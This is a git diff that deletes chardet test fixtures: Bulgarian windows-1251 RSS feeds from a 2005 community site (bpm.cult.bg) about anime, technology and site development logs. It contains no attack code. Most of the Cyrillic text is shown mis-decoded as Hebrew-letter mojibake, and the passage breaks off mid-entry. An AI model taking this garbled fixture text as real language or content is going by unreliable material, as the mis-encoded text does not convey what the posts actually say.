    \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.3.xml b/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.3.xml deleted file mode 100644 index d761063..0000000 --- a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.3.xml +++ /dev/null @@ -1,174 +0,0 @@ - - - - - -animatronica (anime.log) -http://bpm.cult.bg/medusa/logs/?id=3 -<b>ֽומ, םמ םו ֳומ</b><br /> -ֽומ, גנולו ו הא סו סתבףהטר. ֲנולו ו הא מסתחםאור, קו אםטלאצטעא םו ןנטךכ‏קגא ס ןמסכוהםאעא במחא חא נמחמגמעמ ןמםט, ךמעמ טחכוחו םא ךאסועא גתג גטהומעוךאעא. ׳ו םךמט מע םאי-גוכטךטטעו דונמט, ןמגגאכט סו םא וךנאםא, סא נטסףגאםט ס עףר ט עאבכוע. ָ עאךא, ֽומ, חאןמלםט, ךכ‏קמגטעו הףלט עףך סא אםטלו, לאםדא ט ךמלטךס.<br /> -<br /> -<b>אך הא ןףבכטךףגאל עףך?</b><br /> -1. ׀ודטסענטנאר סו ג userlist-א םא סאיעא;<br /> -2. ֲסוךט נודטסענטנאם ןמענובטעוכ למזו הא ןףבכטךףגא גתג גסטקךמ בכמדמגו מסגום ג Devzilla ט Bazaar.<br /> -<br /> -<b>ֿנאגטכא חא ןףבכטךטגאםו?</b><br /> -1. ֽטךאךגט כטםךמגו ךתל ןמנםמדנאפסךמ סתהתנזאםטו! ױל, עמגא בורו חא הנףד כמד, םמ ט עףך ו ןנטכמזטלמ.<br /> -2. ֽו ןףבכטךףגאיעו טחמבנאזוםט, ךמטעמ נאחרטנגאע נאלךאעא םא כמדא - םטךמי םו מבטקא ץמנטחמםעאכום סךנמכ-באנ;<br /> -3. ֿףבכטךףגאיעו והטםסעגוםמ טחמבנאזוםט ג jpg, png ט gif פמנלאע. BMP ט TIF סא עמעאכםמ םוןנטדמהםט חא web;<br /> -4. ֽו ןףבכטךףגאיעו טחמבנאזוםט ןמ-דמכולט מע 10K. ֱכמדמגועו ט בוח עמגא סא מדנמלםט;) -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -ןנוןמנתקגאל : - -Final Fantasy VII -... -http://bpm.cult.bg/medusa/logs/?id=&pid=7575 - -
    -Final Fantasy VII - Advents Children
    -
    -trailerimdb]]>
    - -
    -Final Fantasy VII - Advents Children
    -
    -trailerimdb]]>
    -animatronica (anime.log) -mugsi -2005-12-01T00:12:33+02:00 -
    - -קטבטעמ םו ו סגטךםאכ ס... -http://bpm.cult.bg/medusa/logs/?id=&pid=7573 -קטבטעמ םו ו סגטךםאכ ס 'ץמכאםהוצא' :)]]> -קטבטעמ םו ו סגטךםאכ ס 'ץמכאםהוצא' :)]]> -animatronica (anime.log) -yme -2005-11-30T14:11:33+02:00 - - -Lucy: Daughter of the Devil - -TV... -http://bpm.cult.bg/medusa/logs/?id=&pid=7563 -Lucy: Daughter of the Devil
    -
    -TV IVAdultSwimscreenspilotep. 1]]>
    -Lucy: Daughter of the Devil
    -
    -TV IVAdultSwimscreenspilotep. 1]]>
    -animatronica (anime.log) -Tcmendor -2005-11-22T12:11:43+02:00 -
    - -ּטהחאךט ןמ TCM - -מע cineaste -http://bpm.cult.bg/medusa/logs/?id=&pid=7528 -ּטהחאךט ןמ TCM
    -
    -מע cineaste]]>
    -ּטהחאךט ןמ TCM
    -
    -מע cineaste]]>
    -animatronica (anime.log) -Lucash -2005-11-02T22:11:27+02:00 -
    - -גוקו למזו הא סכוהטר אםטלו... -http://bpm.cult.bg/medusa/logs/?id=&pid=7456 -אםטלו סונטאכ ט םא בתכדאנסךט]]> -אםטלו סונטאכ ט םא בתכדאנסךט]]> -animatronica (anime.log) -Lucash -2005-09-29T10:09:09+02:00 - - -TMCM ו סתךנאשוםטו םא "Too... -http://bpm.cult.bg/medusa/logs/?id=&pid=7450 -TMCM ו סתךנאשוםטו םא "Too much coffe, man", הטאדםמחאעא םא סתגנולוםםט נאבמעוש ץמלמ סאןטוםס. ׂמגא ו ףוב-ךמלטךס ס כוך סאנךאסעטקום ףךכמם. so what?]]> -TMCM ו סתךנאשוםטו םא "Too much coffe, man", הטאדםמחאעא םא סתגנולוםםט נאבמעוש ץמלמ סאןטוםס. ׂמגא ו ףוב-ךמלטךס ס כוך סאנךאסעטקום ףךכמם. so what?]]> -animatronica (anime.log) -ivgin -2005-09-28T13:09:17+02:00 - - -Interstella 5555 - -imdb :: screenshots -http://bpm.cult.bg/medusa/logs/?id=&pid=7305 -Interstella 5555
    -
    -imdb :: screenshots]]>
    -Interstella 5555
    -
    -imdb :: screenshots]]>
    -animatronica (anime.log) -sequential -2005-08-09T15:08:15+02:00 -
    - -ִטסםט ןנמהףצטנאע לאםדא? -http://bpm.cult.bg/medusa/logs/?id=&pid=7220 -לאםדא?]]> -לאםדא?]]> -animatronica (anime.log) -Eneq -2005-07-20T19:07:21+02:00 - - -ץמנא, ענבגא הא גטהטעו עמגא! -מסמבוםמ... -http://bpm.cult.bg/medusa/logs/?id=&pid=7110 - -מסמבוםמ "The island of dr. Moron".
    -
    -link]]>
    - -מסמבוםמ "The island of dr. Moron".
    -
    -link]]>
    -animatronica (anime.log) -Tanuki -2005-06-27T12:06:05+02:00 -
    - -ָחהאהמץא Steamboy ג בד. ָ... -http://bpm.cult.bg/medusa/logs/?id=&pid=7057 -ָחהאהמץא Steamboy ג בד. ָ סו נאהגאל, ט םו סו ... חאשמ םא VHS, סו ןטעאל ... םלא DVD, א חא ךטםמ המנט ט םו סתל סתםףגאכ.]]> -ָחהאהמץא Steamboy ג בד. ָ סו נאהגאל, ט םו סו ... חאשמ םא VHS, סו ןטעאל ... םלא DVD, א חא ךטםמ המנט ט םו סתל סתםףגאכ.]]> -animatronica (anime.log) -Lucash -2005-06-14T18:06:01+02:00 - -
    \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.4.xml b/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.4.xml deleted file mode 100644 index 069ad28..0000000 --- a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.4.xml +++ /dev/null @@ -1,183 +0,0 @@ - - - - - -cybertech corp. (tech.log) -http://bpm.cult.bg/medusa/logs/?id=4 -<b>ָלא סגועכטםא ג עףםוכא!</b><br /> -ֿנוץמהתע מע homo sapiens ךתל robo sapiens ו ענףהום ט באגום. ֽוךא לף ןמלמדםול :) ֿמסכוהםטעו םמגמסעט מע סגועא םא גטסמךטעו עוץםמכמדטט. ּאכךט עוכופמםט, דמכולט וךנאםט, םאםמקטןמגו, בטמךמלן‏ענט, גטבנאעמנט סתס סכתםקוגא באעונט - עוחט ט משו לםמדמ הנףדט טחםוםאהט מע בתהושועמ - עףך ט סודא םא ןמכמגטם צוםא.<br /> -<br /> -<b>אך הא ןףבכטךףגאל עףך?</b><br /> -1. ׀ודטסענטנאר סו ג userlist-א םא סאיעא;<br /> -2. ֲסוךט נודטסענטנאם ןמענובטעוכ למזו הא ןףבכטךףגא גתג גסטקךמ בכמדמגו מסגום ג Devzilla ט Bazaar.<br /> -<br /> -<b>ֿנאגטכא חא ןףבכטךטגאםו?</b><br /> -1. ֽטךאךגט כטםךמגו ךתל ןמנםמדנאפסךמ סתהתנזאםטו! ױל, עמגא בורו חא הנףד כמד, םמ ט עףך ו ןנטכמזטלמ.<br /> -2. ֽו ןףבכטךףגאיעו טחמבנאזוםט, ךמטעמ נאחרטנגאע נאלךאעא םא כמדא - םטךמי םו מבטקא ץמנטחמםעאכום סךנמכ-באנ;<br /> -3. ֿףבכטךףגאיעו והטםסעגוםמ טחמבנאזוםט ג jpg, png ט gif פמנלאע. BMP ט TIF סא עמעאכםמ םוןנטדמהםט חא web;<br /> -4. ֽו ןףבכטךףגאיעו טחמבנאזוםט ןמ-דמכולט מע 10K. ֱכמדמגועו ט בוח עמגא סא מדנמלםט;) -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -Quantum Trickery: Testing Einstein's Strangest... -http://bpm.cult.bg/medusa/logs/?id=&pid=7622 -Quantum Trickery: Testing Einstein's Strangest Theory
    -
    -םו, םו למזאץ הא סו גתחהתנזא, סמנט :)]]>
    -Quantum Trickery: Testing Einstein's Strangest Theory
    -
    -םו, םו למזאץ הא סו גתחהתנזא, סמנט :)]]>
    -cybertech corp. (tech.log) -mims -2005-12-30T00:12:25+02:00 -
    - -םךמי חםאו כט מםכאים לאדאחטם... -http://bpm.cult.bg/medusa/logs/?id=&pid=7619 - -םו ףסןץ הא םאלונ סגוסעום ךאעאכמד ס מםכאיל ןמנתקךט.]]> - -םו ףסןץ הא םאלונ סגוסעום ךאעאכמד ס מםכאיל ןמנתקךט.]]> -cybertech corp. (tech.log) -supudo -2005-12-25T14:12:24+02:00 - - -ָםטצטאעטגאעא םא גוךא: -One Laptop Per... -http://bpm.cult.bg/medusa/logs/?id=&pid=7556 -
    -
    -ָםטצטאעטגאעא םא גוךא:
    -One Laptop Per Child
    -
    -ְלונטךאםסךא פמםהאצט שו מןטעא הא מסטדףנט םא 150 לטכטמםא הוצא כאןעמןט םא צוםא $100. ְנו הא גטהטל.]]>
    -
    -
    -ָםטצטאעטגאעא םא גוךא:
    -One Laptop Per Child
    -
    -ְלונטךאםסךא פמםהאצט שו מןטעא הא מסטדףנט םא 150 לטכטמםא הוצא כאןעמןט םא צוםא $100. ְנו הא גטהטל.]]>
    -cybertech corp. (tech.log) -ivgin -2005-11-17T12:11:33+02:00 -
    - -Looks like the revolution with... -http://bpm.cult.bg/medusa/logs/?id=&pid=7553 - -WILL OWN j00r windowze mahcine...soon
    -miranda dev blog]]>
    - -WILL OWN j00r windowze mahcine...soon
    -miranda dev blog]]>
    -cybertech corp. (tech.log) -yme -2005-11-15T13:11:45+02:00 -
    - -ֽאבכ‏האגאל עו, נאבמעטר - -ֲסוךט הום לוזהף... -http://bpm.cult.bg/medusa/logs/?id=&pid=7541 -ֽאבכ‏האגאל עו, נאבמעטר
    -
    -ֲסוךט הום לוזהף 3עט ט 17עט םמולגנט למזור הא דכוהאר ךאך ג סעתךכוםט אךגאנטףל םא Yahoo נאחםט ץמנא סתחהאגאע.
    -
    -ָלא מםכאים פמנלא, ןנוח ךמעמ הא טחןנאעטר עגמ חאגךא ךאךגמ הא טחלטסכע. ־ע הנףדמ לסעמ ג סאיעא למזור הא דכאסףגאר ךאךגמ הא ו סכוהגאשמעמ טל חאהאםטו. ֽו םא ןמסכוהםמ לסעמ - טלא 5 ךאלונט, ס ךמטעמ הא דט סכוהטר.
    -
    -ַא מסעאםאכמעמ: YahooThinkTank.com]]>
    -ֽאבכ‏האגאל עו, נאבמעטר
    -
    -ֲסוךט הום לוזהף 3עט ט 17עט םמולגנט למזור הא דכוהאר ךאך ג סעתךכוםט אךגאנטףל םא Yahoo נאחםט ץמנא סתחהאגאע.
    -
    -ָלא מםכאים פמנלא, ןנוח ךמעמ הא טחןנאעטר עגמ חאגךא ךאךגמ הא טחלטסכע. ־ע הנףדמ לסעמ ג סאיעא למזור הא דכאסףגאר ךאךגמ הא ו סכוהגאשמעמ טל חאהאםטו. ֽו םא ןמסכוהםמ לסעמ - טלא 5 ךאלונט, ס ךמטעמ הא דט סכוהטר.
    -
    -ַא מסעאםאכמעמ: YahooThinkTank.com]]>
    -cybertech corp. (tech.log) -mims -2005-11-08T11:11:13+02:00 -
    - -ֲקונא מעךנטץ, קו צוםעתנתע םא... -http://bpm.cult.bg/medusa/logs/?id=&pid=7520 - - -cybertech corp. (tech.log) -ivgin -2005-10-28T11:10:46+02:00 - - -case modding at its best -Dark... -http://bpm.cult.bg/medusa/logs/?id=&pid=7519 - -Dark Blade
    -האזו לאי למהטםד םו ו ןנאגטכםטע עונלטם ג סכףקא. עמגא סט ו טחךףסעגמ םאןנאגמ.]]>
    - -Dark Blade
    -האזו לאי למהטםד םו ו ןנאגטכםטע עונלטם ג סכףקא. עמגא סט ו טחךףסעגמ םאןנאגמ.]]>
    -cybertech corp. (tech.log) -yme -2005-10-27T13:10:07+02:00 -
    - -ְנו משו הגו דכאסקועא חא... -http://bpm.cult.bg/medusa/logs/?id=&pid=7518 -ףםעמנמג – לאדאחטםתע, ג ךמיעמ ןנמהאגאע גסטקךט וכוךענמםםט הזאהזט םאגוהםתז.
    -
    -www | map]]>
    -ףםעמנמג – לאדאחטםתע, ג ךמיעמ ןנמהאגאע גסטקךט וכוךענמםםט הזאהזט םאגוהםתז.
    -
    -www | map]]>
    -cybertech corp. (tech.log) -ivgin -2005-10-26T18:10:39+02:00 -
    - -5 דכאסא + חא ֳויע... -http://bpm.cult.bg/medusa/logs/?id=&pid=7513 -ֳויע ֱתכדאנט - מבסכףזגאםו, מעםמרוםטו ט ןנמהףךעט, ט משו םךמכךמ + חא Belkin]]> -ֳויע ֱתכדאנט - מבסכףזגאםו, מעםמרוםטו ט ןנמהףךעט, ט משו םךמכךמ + חא Belkin]]> -cybertech corp. (tech.log) -Lucash -2005-10-24T10:10:26+02:00 - - -google*.* -http://bpm.cult.bg/medusa/logs/?id=&pid=7477 -google*.*]]> -google*.*]]> -cybertech corp. (tech.log) -dubka -2005-10-09T11:10:26+02:00 - -
    \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.9.xml b/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.9.xml deleted file mode 100644 index aff4720..0000000 --- a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.9.xml +++ /dev/null @@ -1,214 +0,0 @@ - - - - - -devzilla (dev.log) -http://bpm.cult.bg/medusa/logs/?id=9 -<b>ֱאעךטעו</b><br /> ֽטו סלו ךאןנטחםט ט לתנחוכטגט ןטקמגו, ךמטעמ מע גנולו םא גנולו ןנאגע *bpm חא ךופ. ְךמ סכףקאיםמ סט םךמי מע ןמסכוהםטעו *bpm ץוהמגו, נופנורגאי עמחט כמד וזוהםוגםמ, חאשמעמ עףך ןףבכטךףגאלו םמגטעו פףםךצטט םא כ‏בטלט עט סאיע. ׁתשמ ט ךאךגט סא סנאלםטעו לף גתרךט.<br /> <br /> <b>אך הא ןףבכטךףגאל עףך?</b><br /> 1. ֽו למזור... עףך ןףבכטךףגאע סאלמ נאחנאבמעקטצטעו םא <b>*bpm</b>.<br /> <br /> <b>ֿנאגטכא חא ןףבכטךטגאםו?</b><br /> 1. ו סט ןףבכטךףגאלו ךאךגמעמ טסךאלו. ֽא-םא. -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -*bpm 5 (medusa 0.6.9 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=7487 -*bpm 5 (medusa 0.6.9 : forum enhancments)
    -+ ץוהתנ ךאנעטםךא חא גסוךט פמנףל/למהףכ (Lucash/ivgin/spud)]]>
    -*bpm 5 (medusa 0.6.9 : forum enhancments)
    -+ ץוהתנ ךאנעטםךא חא גסוךט פמנףל/למהףכ (Lucash/ivgin/spud)]]>
    -devzilla (dev.log) -supudo -2005-10-13T14:10:22+02:00 -
    - -*bpm 5 (medusa 0.6.8 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=7013 -*bpm 5 (medusa 0.6.8 : no-mu-night)

    -‏חתנסךט ןנמפטכ ו תןהויעםאע סןנלמ םמגט הטחאים םא ‏חתנ כטסעא
    -(kaladan/spud/webcrusader)]]> -*bpm 5 (medusa 0.6.8 : no-mu-night)

    -‏חתנסךט ןנמפטכ ו תןהויעםאע סןנלמ םמגט הטחאים םא ‏חתנ כטסעא
    -(kaladan/spud/webcrusader)]]> -devzilla (dev.log) -supudo -2005-06-05T01:06:10+02:00 - - -*bpm 5 (medusa 0.6.7 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=6954 -*bpm 5 (medusa 0.6.7 : commons cretives)

    -ֲסוךט, ךמיעמ טלא סעאעט ג *bpm ט טסךא הא נאחןנמסענאםט ןמה םךמי מע גאנטאםעטעו םא creative commons, םוךא ןטרו םא Lucash.
    -
    -+ סטסעולא חא כטצוםחטנאםו םא סתהתנזאםטועמ ןמה CC ט חאעגמנום כטצוםח (kaladan/spud);
    -
    -+ ןנמלוםט ג editorial-a סגתנחאםט ס כטצוםחטנאםועמ םא סתהתנזאםטו (kaladan/spud);
    -
    -+ ג editorial-א למזו הא סו ןמךאחגאע גסטקךט סעאעטט, םאןטסאםט מע והטם אגעמנ (kaladan/spud)
    -
    -+ סתחהאהוםא ו סעאעטסעטךא חא כטצוםחטעו םא סעאעטטעו (kaladan/spud )| http://bpm.cult.bg/services/licenses/
    -
    -+ ןנט גכטחאםו ג shuriken, ןתנגט וךנאם ו וךנאםתע ס logs (ivgin//spud)
    -
    -+ בנמ םא ןמךאחגאםטעו סםטלךט םא וךנאםא ג printscreen ו ןנמלוםום מע 3, 6, 9 ט 12, סתמעגועםמ םא 9, 18 ט 36. (ivgin/spud)]]> -*bpm 5 (medusa 0.6.7 : commons cretives)
    -ֲסוךט, ךמיעמ טלא סעאעט ג *bpm ט טסךא הא נאחןנמסענאםט ןמה םךמי מע גאנטאםעטעו םא creative commons, םוךא ןטרו םא Lucash.
    -
    -+ סטסעולא חא כטצוםחטנאםו םא סתהתנזאםטועמ ןמה CC ט חאעגמנום כטצוםח (kaladan/spud);
    -
    -+ ןנמלוםט ג editorial-a סגתנחאםט ס כטצוםחטנאםועמ םא סתהתנזאםטו (kaladan/spud);
    -
    -+ ג editorial-א למזו הא סו ןמךאחגאע גסטקךט סעאעטט, םאןטסאםט מע והטם אגעמנ (kaladan/spud)
    -
    -+ סתחהאהוםא ו סעאעטסעטךא חא כטצוםחטעו םא סעאעטטעו (kaladan/spud )| http://bpm.cult.bg/services/licenses/
    -
    -+ ןנט גכטחאםו ג shuriken, ןתנגט וךנאם ו וךנאםתע ס logs (ivgin//spud)
    -
    -+ בנמ םא ןמךאחגאםטעו סםטלךט םא וךנאםא ג printscreen ו ןנמלוםום מע 3, 6, 9 ט 12, סתמעגועםמ םא 9, 18 ט 36. (ivgin/spud)]]>
    -devzilla (dev.log) -Kaladan -2005-05-21T17:05:01+02:00 - - -*bpm 5 (medusa 0.6.6 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=6952 -*bpm 5 (medusa 0.6.6 : reuse me!)
    -
    -+ ראבכמםתע םא userlist-א ו אךעףאכטחטנאם סןנלמ הטחאיםא םא medusa (ivgin/kaladan/webcrusader).
    -
    -+ ״אבכמםתע חא ןמענובטעוכטעו שו בתהו ןנמלוםום סתשמ.
    -
    ----
    -ףענו שו סתחהאהול הגטדאעוכ חא כטצוםחטנאםו םא סעאעטטעו ג וחטםא ןמה CC.]]>
    -*bpm 5 (medusa 0.6.6 : reuse me!)
    -
    -+ ראבכמםתע םא userlist-א ו אךעףאכטחטנאם סןנלמ הטחאיםא םא medusa (ivgin/kaladan/webcrusader).
    -
    -+ ״אבכמםתע חא ןמענובטעוכטעו שו בתהו ןנמלוםום סתשמ.
    -
    ----
    -ףענו שו סתחהאהול הגטדאעוכ חא כטצוםחטנאםו םא סעאעטטעו ג וחטםא ןמה CC.]]>
    -devzilla (dev.log) -Kaladan -2005-05-20T18:05:56+02:00 -
    - -*bpm 5 (medusa 0.6.5 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=6742 -*bpm 5 (medusa 0.6.5 : reblog!)
    -
    -+ אךעףאכטחטנאםא* ו /logs (kaladan);
    -
    ----
    -* המבאגוםט סא mo: dreamlog, speechless, אךעףאכטחטנאםט סא אהנוסטעו םא wondering, zazie, ןנולאץםאעט סא Bitstream bl0g
    -light, skylark, soulseller.]]>
    -*bpm 5 (medusa 0.6.5 : reblog!)
    -
    -+ אךעףאכטחטנאםא* ו /logs (kaladan);
    -
    ----
    -* המבאגוםט סא mo: dreamlog, speechless, אךעףאכטחטנאםט סא אהנוסטעו םא wondering, zazie, ןנולאץםאעט סא Bitstream bl0g
    -light, skylark, soulseller.]]>
    -devzilla (dev.log) -Kaladan -2005-04-02T21:04:10+02:00 -
    - -וי, ץמנא, למכ גט, םו... -http://bpm.cult.bg/medusa/logs/?id=&pid=6650 -ןנמסעמעטט םא *printscreen. ןנמקועועו ףןתעגאםועמ, אךמ ו םףזםמ ט help-א. בכאדמהאנ ןנוהגאנטעוכםמ.]]> -ןנמסעמעטט םא *printscreen. ןנמקועועו ףןתעגאםועמ, אךמ ו םףזםמ ט help-א. בכאדמהאנ ןנוהגאנטעוכםמ.]]> -devzilla (dev.log) -atomant -2005-03-16T21:03:58+02:00 - - -*bpm 5 (medusa 0.6.4 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=6559 -*bpm 5 (medusa 0.6.4 : םוהוכ גוקונעא!)
    -
    -+ המבאגםועמ םא םמגט ןמענובטעוכט נאבמעט בוח ןנמבכולט, עמ ט ןנוהט סט נאבמעורו, םמ חא פטםאכ בתכגארו םךאךגא דנורךא (kaladan/spud);
    -
    -+ printscreen נאבמעט מעםמגמ, atom שו ןמולו מבדנטזגאםועמ לף (kaladan/spud);
    -
    -+ ןמןנאגוםא ו לאכךא ןנאגמןטסםא דנורךא םא טםהוךסא;
    -
    -+ ןנולאץםאעט סא גסטקךט סעאנט כמדמגו (מע 2003-עא דמהטםא - סתשוסעגףגאץא סט ט בץא םאבכתסךאםט ס 85 לודאבאיעא סןאל)]]>
    -*bpm 5 (medusa 0.6.4 : םוהוכ גוקונעא!)
    -
    -+ המבאגםועמ םא םמגט ןמענובטעוכט נאבמעט בוח ןנמבכולט, עמ ט ןנוהט סט נאבמעורו, םמ חא פטםאכ בתכגארו םךאךגא דנורךא (kaladan/spud);
    -
    -+ printscreen נאבמעט מעםמגמ, atom שו ןמולו מבדנטזגאםועמ לף (kaladan/spud);
    -
    -+ ןמןנאגוםא ו לאכךא ןנאגמןטסםא דנורךא םא טםהוךסא;
    -
    -+ ןנולאץםאעט סא גסטקךט סעאנט כמדמגו (מע 2003-עא דמהטםא - סתשוסעגףגאץא סט ט בץא םאבכתסךאםט ס 85 לודאבאיעא סןאל)]]>
    -devzilla (dev.log) -Kaladan -2005-02-27T17:02:28+02:00 -
    - -ֿנוהסעמט ןנמכועםמ ןמקטסעגאםו םא בתדמגו.... -http://bpm.cult.bg/medusa/logs/?id=&pid=6497 - -
    -+ אנץטגתע םא למהףכטעו ג ezine נאבמעט ט גוקו למזו הא םאלונטר עאל ןנמןףסםאעטעו מע עוב סעאעטט (spud)
    -+ המבאגוםט סא כטםךמגו ךתל טםהוךסא םא ezine םא חאדכaגםטעו סענאםטצט םא למהףכטעו, םא ךמטעמ כטןסגאץא עאךטגא (spud)]]>
    - -
    -+ אנץטגתע םא למהףכטעו ג ezine נאבמעט ט גוקו למזו הא םאלונטר עאל ןנמןףסםאעטעו מע עוב סעאעטט (spud)
    -+ המבאגוםט סא כטםךמגו ךתל טםהוךסא םא ezine םא חאדכaגםטעו סענאםטצט םא למהףכטעו, םא ךמטעמ כטןסגאץא עאךטגא (spud)]]>
    -devzilla (dev.log) -Lucash -2005-02-16T21:02:45+02:00 -
    - -991 ףםטךאכםט ןמסושוםט סםמשט. -ֱכאדמהאנ גט. -http://bpm.cult.bg/medusa/logs/?id=&pid=6239 -991 ףםטךאכםט ןמסושוםט סםמשט.
    -ֱכאדמהאנ גט.]]>
    -991 ףםטךאכםט ןמסושוםט סםמשט.
    -ֱכאדמהאנ גט.]]>
    -devzilla (dev.log) -ivgin -2005-01-11T09:01:14+02:00 -
    - -ךנאךםאעט -ֲוקו סטדףנםמ גסטקךט סעונאחבנאכט, קו... -http://bpm.cult.bg/medusa/logs/?id=&pid=5995 -ךנאךםאעט
    -ֲוקו סטדףנםמ גסטקךט סעונאחבנאכט, קו בץלו ךנאךםאעט. ַאדףבוםט סא המסעא טחמבנאזוםט, ג מסםמגםטעו סאיעמגו. ָלאלו בוך תן מע םאקאכמעמ םא סוןעולגנט (ךנא םא אגדףסע), ךמועמ מחםאקאגא, קו שועטעו םו סא עמכךמגא פאעאכםט.]]>
    -ךנאךםאעט
    -ֲוקו סטדףנםמ גסטקךט סעונאחבנאכט, קו בץלו ךנאךםאעט. ַאדףבוםט סא המסעא טחמבנאזוםט, ג מסםמגםטעו סאיעמגו. ָלאלו בוך תן מע םאקאכמעמ םא סוןעולגנט (ךנא םא אגדףסע), ךמועמ מחםאקאגא, קו שועטעו םו סא עמכךמגא פאעאכםט.]]>
    -devzilla (dev.log) -Kaladan -2004-12-03T19:12:22+02:00 -
    - \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.medusa.4.xml b/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.medusa.4.xml deleted file mode 100644 index 9303162..0000000 --- a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.medusa.4.xml +++ /dev/null @@ -1,183 +0,0 @@ - - - - - -cybertech corp. (tech.log) -http://bpm.cult.bg/medusa/logs/?id=4 -<b>ָלא סגועכטםא ג עףםוכא!</b><br /> -ֿנוץמהתע מע homo sapiens ךתל robo sapiens ו ענףהום ט באגום. ֽוךא לף ןמלמדםול :) ֿמסכוהםטעו םמגמסעט מע סגועא םא גטסמךטעו עוץםמכמדטט. ּאכךט עוכופמםט, דמכולט וךנאםט, םאםמקטןמגו, בטמךמלן‏ענט, גטבנאעמנט סתס סכתםקוגא באעונט - עוחט ט משו לםמדמ הנףדט טחםוםאהט מע בתהושועמ - עףך ט סודא םא ןמכמגטם צוםא.<br /> -<br /> -<b>אך הא ןףבכטךףגאל עףך?</b><br /> -1. ׀ודטסענטנאר סו ג userlist-א םא סאיעא;<br /> -2. ֲסוךט נודטסענטנאם ןמענובטעוכ למזו הא ןףבכטךףגא גתג גסטקךמ בכמדמגו מסגום ג Devzilla ט Bazaar.<br /> -<br /> -<b>ֿנאגטכא חא ןףבכטךטגאםו?</b><br /> -1. ֽטךאךגט כטםךמגו ךתל ןמנםמדנאפסךמ סתהתנזאםטו! ױל, עמגא בורו חא הנףד כמד, םמ ט עףך ו ןנטכמזטלמ.<br /> -2. ֽו ןףבכטךףגאיעו טחמבנאזוםט, ךמטעמ נאחרטנגאע נאלךאעא םא כמדא - םטךמי םו מבטקא ץמנטחמםעאכום סךנמכ-באנ;<br /> -3. ֿףבכטךףגאיעו והטםסעגוםמ טחמבנאזוםט ג jpg, png ט gif פמנלאע. BMP ט TIF סא עמעאכםמ םוןנטדמהםט חא web;<br /> -4. ֽו ןףבכטךףגאיעו טחמבנאזוםט ןמ-דמכולט מע 10K. ֱכמדמגועו ט בוח עמגא סא מדנמלםט;) -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -Quantum Trickery: Testing Einstein's Strangest... -http://bpm.cult.bg/medusa/logs/?id=&pid=7622 -Quantum Trickery: Testing Einstein's Strangest Theory
    -
    -םו, םו למזאץ הא סו גתחהתנזא, סמנט :)]]>
    -Quantum Trickery: Testing Einstein's Strangest Theory
    -
    -םו, םו למזאץ הא סו גתחהתנזא, סמנט :)]]>
    -cybertech corp. (tech.log) -mims -2005-12-30T00:12:25+02:00 -
    - -םךמי חםאו כט מםכאים לאדאחטם... -http://bpm.cult.bg/medusa/logs/?id=&pid=7619 - -םו ףסןץ הא םאלונ סגוסעום ךאעאכמד ס מםכאיל ןמנתקךט.]]> - -םו ףסןץ הא םאלונ סגוסעום ךאעאכמד ס מםכאיל ןמנתקךט.]]> -cybertech corp. (tech.log) -supudo -2005-12-25T14:12:24+02:00 - - -ָםטצטאעטגאעא םא גוךא: -One Laptop Per... -http://bpm.cult.bg/medusa/logs/?id=&pid=7556 -
    -
    -ָםטצטאעטגאעא םא גוךא:
    -One Laptop Per Child
    -
    -ְלונטךאםסךא פמםהאצט שו מןטעא הא מסטדףנט םא 150 לטכטמםא הוצא כאןעמןט םא צוםא $100. ְנו הא גטהטל.]]>
    -
    -
    -ָםטצטאעטגאעא םא גוךא:
    -One Laptop Per Child
    -
    -ְלונטךאםסךא פמםהאצט שו מןטעא הא מסטדףנט םא 150 לטכטמםא הוצא כאןעמןט םא צוםא $100. ְנו הא גטהטל.]]>
    -cybertech corp. (tech.log) -ivgin -2005-11-17T12:11:33+02:00 -
    - -Looks like the revolution with... -http://bpm.cult.bg/medusa/logs/?id=&pid=7553 - -WILL OWN j00r windowze mahcine...soon
    -miranda dev blog]]>
    - -WILL OWN j00r windowze mahcine...soon
    -miranda dev blog]]>
    -cybertech corp. (tech.log) -yme -2005-11-15T13:11:45+02:00 -
    - -ֽאבכ‏האגאל עו, נאבמעטר - -ֲסוךט הום לוזהף... -http://bpm.cult.bg/medusa/logs/?id=&pid=7541 -ֽאבכ‏האגאל עו, נאבמעטר
    -
    -ֲסוךט הום לוזהף 3עט ט 17עט םמולגנט למזור הא דכוהאר ךאך ג סעתךכוםט אךגאנטףל םא Yahoo נאחםט ץמנא סתחהאגאע.
    -
    -ָלא מםכאים פמנלא, ןנוח ךמעמ הא טחןנאעטר עגמ חאגךא ךאךגמ הא טחלטסכע. ־ע הנףדמ לסעמ ג סאיעא למזור הא דכאסףגאר ךאךגמ הא ו סכוהגאשמעמ טל חאהאםטו. ֽו םא ןמסכוהםמ לסעמ - טלא 5 ךאלונט, ס ךמטעמ הא דט סכוהטר.
    -
    -ַא מסעאםאכמעמ: YahooThinkTank.com]]>
    -ֽאבכ‏האגאל עו, נאבמעטר
    -
    -ֲסוךט הום לוזהף 3עט ט 17עט םמולגנט למזור הא דכוהאר ךאך ג סעתךכוםט אךגאנטףל םא Yahoo נאחםט ץמנא סתחהאגאע.
    -
